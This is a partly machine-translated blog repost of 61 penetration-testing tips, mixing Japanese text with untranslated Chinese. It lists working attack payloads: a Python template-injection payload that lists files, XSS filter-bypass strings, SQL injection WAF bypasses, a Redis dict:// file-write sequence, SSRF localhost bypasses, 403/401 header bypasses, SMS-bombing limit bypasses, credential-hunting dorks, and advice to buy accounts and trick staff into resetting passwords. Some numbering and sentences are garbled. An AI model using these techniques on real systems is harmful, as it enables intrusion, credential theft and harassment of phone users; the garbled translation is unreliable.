侵入テストの一般的な問題に対する 61 の小さなヒント

1. {msg: params error} など、パラメーターが欠落していることを示すプロンプトが表示された場合は、辞書ファジングを使用して、さらなる攻撃に備えてパラメーターを構築してみてください。

2. プログラムがオーバーフローします。int の最大値は 2147483647 です。この値を整数オーバーフローに使用して、現象を観察してみてください。

3. 403、404 応答に落胆せず、dirsearch などのツールを使用してディレクトリを検出してみてください。

4. 検証コードの単純なバイパス: 再利用、ユニバーサル検証コード (0000、8888)、空の検証コード、検証コードが識別可能 (PKAV HTTP Fuzzer ツールなどで識別可能)

5. SMS 爆撃バイパス: 携帯電話番号の前に +86 を追加すると、携帯電話番号をメールボックスに入力し、メールボックスに携帯電話番号を入力します。

6. 認証コードが有効な場合は、一定期間繰り返し認証コードの送信を試みることができますが、有効であるため、認証コードの有効期間が延長される場合があります。

7. SQL インジェクションの際、データベースが MySQL の場合は、&& を使用して and を置き換えることができます。たとえば、「 && '1'='1,' %26%26 '1'='1」です。

8. SQL インジェクションの場合、データベースが Mysql の場合、waf filters = の代わりに like を使用してみることができます。例: および 1 のような 1

9. JWT 形式は jwt.calebb.net/ で復号化できます。前提条件は秘密鍵を知っていることです。任意のデータを構築して、秘密鍵情報を含むエラー メッセージが表示されるかどうかを確認できます。 github.com/firebase/php JWT を生成します。

JWT形式のheader.payload.signature

10. Redis サービス (ポート 1234) が開いている場合は、/actuator/redis/info ステートメントを使用して、xxx​​.com:1234/actuator/r などの機密情報を読み取れるかどうかを確認できます。

11. Gitlab プラットフォームの脆弱性 - CVE-2020-10977

12. API インターフェイスでは、自分でパラメータを構築したり、POST 形式でパラメータを渡したり、JSON 形式で構築してみることができます。必ず content-type: application/json、いくつかの試用可能なパラメータ、ページ、サイズ、 ID。

13. 携帯電話にテキスト メッセージの送信に制限がある場合は、携帯電話番号の前に特殊文字またはスペースを使用してみてください。

彼のロジックは次のようになります。ユーザーが携帯電話番号を入力します --> バックエンドは携帯電話番号が 30 秒以内に要求されたか 60 秒以内に要求されたかを判断します --> そうでない場合は、送信された携帯電話番号が十分純粋かどうかを判断します11桁の数字の場合

そうでない場合は、数字以外の文字を削除します --> データベース内の携帯電話番号と比較し、データベースに存在するだけで十分です。存在する場合は、確認コードを携帯電話に送信します。

14. 画像検証コードは次のように空に設定できます: code=unknown

15. 検証コードの内容を自動的に使用して、Cookie およびパラメーターにユーザーに送信される内容があるかどうかを監視し、変更を試みたり、フィッシング リンクを構築したりできます。

16. テンプレート インジェクション、 {{xxx}} に入力されたコマンド パラメーターは次のように実行できます。

www.baidu.com/{
   
   {1+1}}
以Python为例,列出当前目录下所有文件的Payload:{
   
   {''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

17. 情報収集の場合は、総合検索でWeChatを選択し、関連企業の関連公式アカウントのアセットを検索します。

18. JS ファイル内でキーワード API、Swagger UI などを検索し、API インターフェイス アドレスを見つけてみます。

19. Swagger インターフェイスの共通パス:

/swagger/
/api/swagger/
/swagger/ui/
/api/swagger/ui/
/swagger-ui.html/
/api/swagger-ui.html/
/user/swagger-ui.html/
/swagger/ui/
/api/swagger/ui/
/libs/swaggerui/
/api/swaggerui/
/swagger-resources/configuration/ui/
/swagger-resources/configuration/security/

20. Swagger コンポーネント機能のタイトルが修正されました: Swagger UI

21. ディレクトリが存在するかどうかをブラインドでテストします。ディレクトリが存在する場合は、URL の末尾に自動的に追加/補完されます。

22. Mysql で使用できる空白文字は、%09、%0a、%0b、%0c、%0d、%20、%a0 です。

23. アカウント取得: ライブラリ、QQ グループ、github リーク、アカウントの借用/レンタル/購入。

24. Alibaba Cloud の AKSK が漏洩した場合、AKSKtools ツールを使用してさらに悪用できます。

xz.aliyun.com/t/842925。バックグラウンド ページが点滅してログインを求められる場合は、通常は権限認証方法が使用されますが、次の方法を使用してそれを回避できます。または、401 が発生した場合は、 、403、302 の場合は、次の方法を試すことができます。

一、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
X-Original-URL: /xxx
二、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
Referer: http://test.com/xxx
三、302跳转:拦截并drop跳转的数据包,使其停留在当前页面。
四、前端验证:只需要删掉对应的遮挡模块,或者是验证模块的前端代码。

26. gopher プロトコル ペイロードを生成するツール:

https://github.com/firebroo/sec_tools

27. 辞書プロトコルの作成プロセス:

1.写入内容;
dict://127.0.0.1:6379/set❌test
2.设置保存路径;
dict://127.0.0.1:6379/config:set:dir:/tmp/
3.设置保存文件名;
dict://127.0.0.1:6379/config:set:dbfilename:1.png
4.保存。
dict://127.0.0.1:6379/save

28. CentOS 7 システムは、suid を使用して、ルート シェルを取得する権限を昇格します。

https://www.freebuf.com/articles/system/244627.html

29. xss のタグで使用されるペイロード:

<a href=javascript:alert(1)>xx</a>

30. XSS は一重引用符をフィルター処理し、等号は次のことができます。

①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);
为alert(1),该方法输出的结果为字符串,可以使用eval()进行执行,即弹框操作
eval(String.fromCharCode(97,108,101,114,116,40,49,41));
②、atob函数:
eval(atob`YWxlcnQoMSk=`) 为 eval(atob`alert(1)`) 其中`为反引号

31. XSS は一重引用符、等号、括弧、eval をフィルターします。

①、过滤了eval函数可以用其他函数去绕过,如:Function,constructor
Function`a${atob`YWxlcnQoMSk=`}```
``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```

32. 次のコマンドを使用して、Docker 仮想マシン内にいるかどうかを確認できます。

cat /proc/1/cgroup

33. ユニバーサル パスワード'=0#34 を試します。CORS 脆弱性の検証、curl を使用して次のことを検証できます。

curl https://www.xxxx.com -H "Origin: https://test.com" -I
检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com

35. ターゲットシステムがShiroであるかどうかを盲目的にテストする場合、Cookie内にrememebrMe=xxxを手動で構築できます。

返されたパッケージの Set-Cookie に rememberMe=deleteMe があれば、そのシステムが Shiro を使用していることが証明されるため、さらに攻撃される可能性があります。

36. 正規表現を使用して、Web サイトに含まれる他の URL を取得します。

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

37. いくつかの一般的なリモート コマンド実行 (RCE) パラメータについては、dicts ディレクトリの RCE-extentions.txt ファイルを参照してください。

38. SSRF 保護をバイパスするいくつかの小さな方法:

A、绕过SSRF限制通过CIDR,如:
http://127.127.127.127
http://127.0.0.0
B、不完整的地址,如:
http://127.1
http://0
C、将地址结合在通过特殊字符结合在一起,如:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3
D、绕过解析器,如:
http://127.1.1.1:80\@127.2.2.2:80/
E、绕过localhost通过[::],如:
http://[::]:80/
http://0000::1:80/

39. 一般的に使用されるいくつかの Google 文法:

inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

40. ファビコンのハッシュを使用して、関連する 2 つの Web サイトを比較します。

脚本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s

41. いくつかのローカルパラメータが含まれています。詳細については、dicts ディレクトリ内の LFI-extentions.txt ファイルを参照してください。

42. JavaScript ファイルには、次のような隠し GET パラメータがいくつかあります。

首先,在js文件中找到一些变量,比如:var test="xss"
然后,可以尝试使用GET方法构造每一个参数,比如:
https://example.com/?test=”xsstest
本方法可能会发现一些XSS

43. github dorks を使用して、次のような機密情報を見つけます。

extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic “support.avast.com”
extension:js jsforce conn.login
extension:json googleusercontent client_secret
“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth
通过上述语法,可以搜索到一些敏感的私钥,一些SSH登录私钥,mysql的数据库密码,API key等等。
另外推荐一个脚本:https://github.com/techgaun/github-dorks

44. SSRF の共通パラメータについては、dicts ディレクトリの SSRF-extensions.txt ファイルを参照してください。

45. .json サフィックスを追加すると、次のような機密情報が漏洩します。

一次正常请求:
GET /ResetPassword HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
添加.json后缀的请求:
GET /ResetPassword.json HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
原链接:https://twitter.com/SalahHasoneh1/status/1293918353971531776

46. 応答が 401 の場合は、リクエスト ヘッダーに X-Custom-IP-Authorization: 127.0.0.1 を追加してみてください。

47. バックグラウンドでログインする Web サイトに関しては、パスワード リセット機能があり、それが無効になっている場合は、会社の技術 QQ グループを見つけて、ユーザーがパスワードを忘れたふりをして、パスワードのリセットを要求し、機能を有効にして、パスワード リセットのバグがあるかどうかを確認します。

48. 背景ページが点滅してログインを求められる場合は、通常、権限認証方法を使用します。

49、302 ジャンプ: リダイレクトされたデータ パケットをインターセプトしてドロップし、現在のページに留まります。

この操作は毎回失敗しますが、返された 302 を 200 に変更して、[場所] フィールドを削除することができます。

50. 任意のファイルをダウンロードします: /porc/self/cmdline --現在のプロセスの cmdline パラメータ、/var/lib/mlocate/mlocate.db --完全なファイル パス。

51. SMS 爆撃が発生しやすいいくつかのビジネス シナリオとバイパス方法:

①:登录处
 ②:注册处
 ③:找回密码处
 ④:绑定处
 ⑤:活动领取处
 ⑥:独特功能处 
⑦:反馈处
一般绕过限制方法:
手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符号等
修改cookie,变量,返回
138888888889   12位经过短信网关取前11位,导致短信轰炸

52. 注入するときに、 --%0a Union --%0a select を試してバイパスを試みることができます。

53. 注入するときは、order by、group by、{$var} について詳しく読んでください。

54. 携帯電話番号の前に + を追加すると、SMS 爆弾が発生します。

55. サイド ステーションの応答に SMS 認証コードが表示された場合は、メイン ステーションまたは他のステーションの認証コードが共通であるかどうかを試してください。

56. SMS 認証コードを取得する際は、2 つの携帯電話番号をカンマで区切ってください。2 つの携帯電話番号が同じ認証コードを取得できる可能性があります。

57. インジェクションと ord(0x1)->true および ord(0x0)->false をテストします。

58. ファイル読み取りの脆弱性が発生した場合は、設定ファイルの読み取りに加えて、コード監査を実施するために Web サイトのファイルを読み取ることもできます。開発を怠ったためにソース コードに抜け穴がある可能性があります。

59. Python を使用して http サーバーをすばやく開きます。

基于python2.x,命令如下:
python -m SimpleHTTPServer 8000
# 在当前目录起个 8000 端口的 HTTP 服务
基于python3.x,命令如下:
python -m http.server 8000

60. 侵入するときに自分の IP アドレスを公開しないようにしてください。プロキシをハングする必要があります。

Linux で端末がプロキシを使用しているかどうかを確認したい場合は、curlifconfig.me/ で返された IP アドレスを確認できます。

Windows は ifconfig.me/ に直接アクセスできます。

61. 辞書を整理するときは、Linux で迅速にマージと重複排除を行うツールを使用することをお勧めします。

cat file1.txt file2.txt fileN.txt > out.txt
sort out.txt | uniq > out2.txt

おすすめ

転載: blog.csdn.net/weixin_52501704/article/details/128656627